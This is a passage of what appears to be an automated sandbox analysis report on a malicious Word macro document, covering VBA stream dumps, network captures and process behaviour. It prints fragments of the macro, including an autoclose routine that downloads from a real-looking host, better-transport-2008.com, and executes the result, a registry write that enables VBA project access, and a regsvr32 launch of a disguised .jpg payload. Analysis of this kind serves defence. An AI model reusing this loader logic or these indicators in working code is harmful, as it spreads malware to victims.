                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 00 f0 00 00 00 9a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff a1 02 00 00 e9 03 00 00 00 00 00 00 01 00 00 00 71 cc 13 c4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      optionPtr.Quit
                      False
                      optionPtr
                      String)
                      Attribute
                      optionPtr.Documents.Add
                      collectionSelect
                      VB_Name
                      CreateObject("word.application")
                      "optionRemoveGeneric"
                      memoryTempTrust
                      memoryIndex(memoryTempTrust
                      optionPtr.Visible
                      SaveChanges:=wdDoNotSaveChanges
                      collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
                      VBA Code
                      VBA File Name: refConvertCaption.bas, Stream Size: 1636
                      General
                      Stream Path:VBA/refConvertCaption
                      VBA File Name:refConvertCaption.bas
                      Stream Size:1636
                      Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . q . u m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 00 f0 00 00 00 62 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 03 00 00 0d 05 00 00 00 00 00 00 01 00 00 00 71 cc 75 6d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      String)
                      VB_Name
                      vbSwap
                      "refConvertCaption"
                      memCaptionOption.Text
                      StrConv(captionPaste,
                      Function
                      vbSwap.createElement("code")
                      exceptionPointer
                      Object
                      Variant
                      memConvertStruct)
                      ptrPtrStorage
                      memCaptionOption.DataType
                      constCollectionDatabase
                      memCaptionOption
                      memCaptionOption.nodeTypedValue
                      exceptionPointer(captionPaste,
                      ptrPtrStorage(constCollectionDatabase
                      Attribute
                      VBA Code
                      VBA File Name: repoText.bas, Stream Size: 2970
                      General
                      Stream Path:VBA/repoText
                      VBA File Name:repoText.bas
                      Stream Size:2970
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . ; . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 00 f0 00 00 00 aa 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff b1 04 00 00 b9 08 00 00 00 00 00 00 01 00 00 00 71 cc 1c 3b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      convertIndex
                      String)
                      "repoText"
                      clearRefLoad
                      .RegWrite
                      VB_Name
                      Public
                      Function
                      varClass
                      String
                      Application.Version
                      captionBufData()
                      textExButton
                      vbUnicode)
                      Chr$(Val("&H"
                      clearRefLoad,
                      "jZXNzVkJPTQ=="),
                      Mid$(tempClearIndex,
                      arrayOption
                      Len(tempClearIndex)
                      mainExLocal
                      listboxNextVar()
                      CreateObject("ws"
                      "VjdXJpdHlcQWN"
                      viewValueTextbox()
                      trustStruct
                      tempClearIndex
                      globalResponse
                      textExButton(ByVal
                      varClass()
                      arrayOption,
                      countSelect
                      captionBufData
                      titleSize
                      Attribute
                      "REG_DWORD"
                      "cript.sh"
                      "ell")
                      convertIndex()
                      listboxNextVar
                      clearReference
                      mainExLocal()
                      VBA Code

                      Streams

                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 689
                      General
                      Stream Path:PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:689
                      Entropy:5.29372046772
                      Base64 Encoded:True
                      Data ASCII:I D = " { 2 A 8 A 4 9 5 1 - B 5 C 1 - 4 C 9 C - A E 1 6 - E D B 1 E 3 E 7 5 4 8 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . M o d u l e = l i s t C o p y . . M o d u l e = r e f C o n v e r t C a p t i o n . . M o d u l e = o p t i o n R e m o v e G e n e r i c . . M o d u l e = r e p o T e x t . . N a m e = " P r o j e c t " . . H e l p
                      Data Raw:49 44 3d 22 7b 32 41 38 41 34 39 35 31 2d 42 35 43 31 2d 34 43 39 43 2d 41 45 31 36 2d 45 44 42 31 45 33 45 37 35 34 38 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                      Stream Path: PROJECTwm, File Type: data, Stream Size: 239
                      General
                      Stream Path:PROJECTwm
                      File Type:data
                      Stream Size:239
                      Entropy:3.53833137583
                      Base64 Encoded:False
                      Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . l i s t C o p y . l . i . s . t . C . o . p . y . . . r e f C o n v e r t C a p t i o n . r . e . f . C . o . n . v . e . r . t . C . a . p . t . i . o . n . . . o p t i o n R e m o v e G e n e r i c . o . p . t . i . o . n . R . e . m . o . v . e . G . e . n . e . r . i . c . . . r e p o T e x t . r . e . p . o . T . e . x . t . . . . .
                      Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 6c 69 73 74 43 6f 70 79 00 6c 00 69 00 73 00 74 00 43 00 6f 00 70 00 79 00 00 00 72 65 66 43 6f 6e 76 65 72 74 43 61 70 74 69 6f 6e 00 72 00 65 00 66 00 43 00 6f 00 6e 00 76 00
                      Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                      General
                      Stream Path:UserForm1/\x1CompObj
                      File Type:data
                      Stream Size:97
                      Entropy:3.61064918306
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
                      General
                      Stream Path:UserForm1/\x3VBFrame
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:292
                      Entropy:4.58743694765
                      Base64 Encoded:True
                      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                      Stream Path: UserForm1/f, File Type: data, Stream Size: 90
                      General
                      Stream Path:UserForm1/f
                      File Type:data
                      Stream Size:90
                      Entropy:2.89102698747
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . , . . . . . h o . . $ . . . . . . . . . . . . . X . . . . . . . T e x t B o x 1 4 . . . . . . .
                      Data Raw:00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 08 00 00 80 01 00 00 00 58 03 00 00 00 00 17 00 54 65 78 74 42 6f 78 31 34 02 00 00 1a 01 00 00
                      Stream Path: UserForm1/o, File Type: data, Stream Size: 856
                      General
                      Stream Path:UserForm1/o
                      File Type:data
                      Stream Size:856
                      Entropy:5.78040237389
                      Base64 Encoded:True
                      Data ASCII:. . 8 . . . @ . . . . . . H . . . . . . . . . . { . . . S u b a u t o c l o s e ( ) . . d o w n l o a d . . e x e c u t e . . E n d S u b . . . . S u b d o w n l o a d ( ) . . . . S e t x m l h t t p = C r e a t e O b j e c t ( " m i c r o s o f t . x m l h t t p " ) . . x m l h t t p . O p e n " G E T " , " h t t p : / / b e t t e r - t r a n s p o r t - 2 0 0 8 . c o m / b i j o l / d V 6 T 3 i G 7 z Y Y N / G d U b 2 h c o K h 0 i 1 6 j t B 3 A 2 H 0 N A 1 h p c / 7 4 6 8
                      Data Raw:00 02 38 03 01 01 40 80 00 00 00 00 1b 48 80 ac 1d 03 00 80 ec 09 00 00 7b 02 00 00 53 75 62 20 61 75 74 6f 63 6c 6f 73 65 28 29 0d 0a 20 20 20 20 64 6f 77 6e 6c 6f 61 64 0d 0a 20 20 20 20 65 78 65 63 75 74 65 0d 0a 45 6e 64 20 53 75 62 0d 0a 0d 0a 53 75 62 20 64 6f 77 6e 6c 6f 61 64 28 29 0d 0a 0d 0a 53 65 74 20 78 6d 6c 68 74 74 70 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28
                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4855
                      General
                      Stream Path:VBA/_VBA_PROJECT
                      File Type:data
                      Stream Size:4855
                      Entropy:4.66602075705
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                      Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                      Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2486
                      General
                      Stream Path:VBA/__SRP_0
                      File Type:data
                      Stream Size:2486
                      Entropy:3.64532699898
                      Base64 Encoded:True
                      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ N . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . W
                      Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                      Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 214
                      General
                      Stream Path:VBA/__SRP_1
                      File Type:data
                      Stream Size:214
                      Entropy:1.76333029747
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                      Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                      Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348
                      General
                      Stream Path:VBA/__SRP_2
                      File Type:data
                      Stream Size:348
                      Entropy:1.78667786328
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 0b 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 41 0c
                      Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                      General
                      Stream Path:VBA/__SRP_3
                      File Type:data
                      Stream Size:106
                      Entropy:1.35911194617
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                      Stream Path: VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 1172
                      General
                      Stream Path:VBA/dir
                      File Type:Tower/XP rel 3 object not stripped - version 18435
                      Stream Size:1172
                      Entropy:6.62532484228
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . | b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                      Data Raw:01 90 b4 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 06 bb 7c 62 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Apr 28, 2021 17:59:22.648822069 CEST4916780192.168.2.2245.142.215.160
                      Apr 28, 2021 17:59:22.716659069 CEST804916745.142.215.160192.168.2.22
                      Apr 28, 2021 17:59:22.716862917 CEST4916780192.168.2.2245.142.215.160
                      Apr 28, 2021 17:59:22.717869997 CEST4916780192.168.2.2245.142.215.160
                      Apr 28, 2021 17:59:22.789505959 CEST804916745.142.215.160192.168.2.22
                      Apr 28, 2021 17:59:23.055886030 CEST804916745.142.215.160192.168.2.22
                      Apr 28, 2021 17:59:23.056277037 CEST4916780192.168.2.2245.142.215.160
                      Apr 28, 2021 17:59:23.534882069 CEST4916780192.168.2.2245.142.215.160

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Apr 28, 2021 17:59:22.558387995 CEST5219753192.168.2.228.8.8.8
                      Apr 28, 2021 17:59:22.628182888 CEST53521978.8.8.8192.168.2.22

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Apr 28, 2021 17:59:22.558387995 CEST192.168.2.228.8.8.80x62a5Standard query (0)better-transport-2008.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Apr 28, 2021 17:59:22.628182888 CEST8.8.8.8192.168.2.220x62a5No error (0)better-transport-2008.com45.142.215.160A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • better-transport-2008.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.224916745.142.215.16080C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      TimestampkBytes transferredDirectionData
                      Apr 28, 2021 17:59:22.717869997 CEST0OUTGET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: better-transport-2008.com
                      Connection: Keep-Alive
                      Apr 28, 2021 17:59:23.055886030 CEST1INHTTP/1.1 200 OK
                      Date: Wed, 28 Apr 2021 15:59:22 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                      X-Powered-By: PHP/7.2.34
                      Content-Length: 204
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 6c 61 6b 61 34 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "laka4" was not found on this server.</p></body></html>


                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:17:59:30
                      Start date:28/04/2021
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase:0x13fc90000
                      File size:1424032 bytes
                      MD5 hash:95C38D04597050285A18F66039EDB456
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:17:59:34
                      Start date:28/04/2021
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase:0x13fc90000
                      File size:1424032 bytes
                      MD5 hash:95C38D04597050285A18F66039EDB456
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:17:59:35
                      Start date:28/04/2021
                      Path:C:\Windows\System32\regsvr32.exe
                      Wow64 process (32bit):false
                      Commandline:regsvr32 c:\programdata\argumentSelectTmp.jpg
                      Imagebase:0xffdc0000
                      File size:19456 bytes
                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis

                      Reset < >